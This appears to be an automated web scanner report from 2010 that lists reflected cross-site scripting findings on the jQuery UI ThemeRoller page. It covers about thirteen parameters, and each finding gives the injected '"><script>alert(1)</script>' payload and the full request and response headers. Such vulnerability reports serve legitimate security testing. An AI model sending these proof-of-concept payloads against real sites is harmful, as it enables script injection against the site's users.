The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a5c"><script>alert(1)</script>aafa9f7e456 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec83a5c"><script>alert(1)</script>aafa9f7e456&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71047"><script>alert(1)</script>322de3bc4ee was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E671047"><script>alert(1)</script>322de3bc4ee&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0cc"><script>alert(1)</script>05af9fa5873 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88fe0cc"><script>alert(1)</script>05af9fa5873&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4cf7"><script>alert(1)</script>bd812dcb8db was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1dfc4cf7"><script>alert(1)</script>bd812dcb8db&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0062"><script>alert(1)</script>44c898d98f6 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaac0062"><script>alert(1)</script>44c898d98f6&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99072"><script>alert(1)</script>6e4b3546877 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa99072"><script>alert(1)</script>6e4b3546877&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e233d"><script>alert(1)</script>dfa3cab4bb9 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100e233d"><script>alert(1)</script>dfa3cab4bb9&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f79f"><script>alert(1)</script>2687cae33c8 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=1004f79f"><script>alert(1)</script>2687cae33c8&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd3b"><script>alert(1)</script>ad29cf7f0db was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85bdd3b"><script>alert(1)</script>ad29cf7f0db&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11622"><script>alert(1)</script>2a8698a89ee was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9511622"><script>alert(1)</script>2a8698a89ee&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803b0"><script>alert(1)</script>c470df28bbc was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55803b0"><script>alert(1)</script>c470df28bbc&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93d9"><script>alert(1)</script>d8f0585ac03 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55c93d9"><script>alert(1)</script>d8f0585ac03&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2f63"><script>alert(1)</script>a1fb44a8ffa was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75a2f63"><script>alert(1)</script>a1fb44a8ffa&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
